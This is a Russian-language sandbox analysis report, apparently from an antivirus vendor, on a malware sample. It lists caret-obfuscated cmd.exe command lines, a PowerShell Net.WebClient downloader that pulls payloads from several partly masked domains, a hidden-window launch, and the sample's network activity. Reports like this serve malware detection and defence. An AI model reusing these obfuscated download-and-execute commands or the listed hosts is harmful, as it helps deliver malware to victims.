Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"s^e^t Y^yK^J=Y^m\;{^BX'R52vx^QsNvCc^fMs^u'x^*v=F^6c^f^[^:^z^m^W0^8G8dV^$d^[c^}^K^t^T^}^zX;{UW^8^ho}^Yc^_^@^Zt)V*^a^K\^EcW^J^A^}^h0^`^}^6Ia;^F=^>^k%S...
Сетевая активность
Подключается к
- 'om####oodwin.com':80
- 'om####oodwin.com':443
- 'ni###corp.com':80
- 'fu##ron.net':80
- 'fu##ron.net':443
- 'co###mars.com':80
- 'co###mars.com':443
TCP
Запросы HTTP GET
- http://om####oodwin.com/Dj
- http://ni###corp.com/z0wtfl4V
- http://fu##ron.net/ajkR
- http://co###mars.com/g8T
Другие
- 'om####oodwin.com':443
- 'fu##ron.net':443
- 'co###mars.com':443
UDP
- DNS ASK om####oodwin.com
- DNS ASK ni###corp.com
- DNS ASK fu##ron.net
- DNS ASK co###mars.com
- DNS ASK ch#####asatredeemer.org
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"s^e^t Y^yK^J=Y^m\;{^BX'R52vx^QsNvCc^fMs^u'x^*v=F^6c^f^[^:^z^m^W0^8G8dV^$d^[c^}^K^t^T^}^zX;{UW^8^ho}^Yc^_^@^Zt)V*^a^K\^EcW^J^A^}^h0^`^}^6Ia;^F=^>^k%S...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"s^e^t Y^yK^J=Y^m/;{^BX'R52vx^QsNvCc^fMs^u'x^*v=F^6c^f^[^:^z^m^W0^8G8dV^$d^[c^}^K^t^T^}^zX;{UW^8^ho}^Yc^_^@^Zt)V*^a^K/^EcW^J^A^}^h0^`^}^6Ia;^F=^>^k%S^OaG^#^m^e^y^dQr:^Y^~b+r^;;3^Mv^'^Kr8nEV...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo $jCf='EIz';$MCd=new-object Net.WebClient;$wqw='http://om####oodwin.com/Dj@http://niteccorp.com/z0wtfl4V@http://futuron.net/ajkR@http://consumars.com/g8T@http://christmasatredeeme...
- '<SYSTEM32>\cmd.exe' /S /D /c" FOR /F "tokens=2 delims=E.M" %i IN ('ftype^|findstr lM') DO %i -"
- '<SYSTEM32>\cmd.exe' /c ftype|findstr lM
- '<SYSTEM32>\cmd.exe' /S /D /c" ftype"
- '<SYSTEM32>\findstr.exe' lM
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
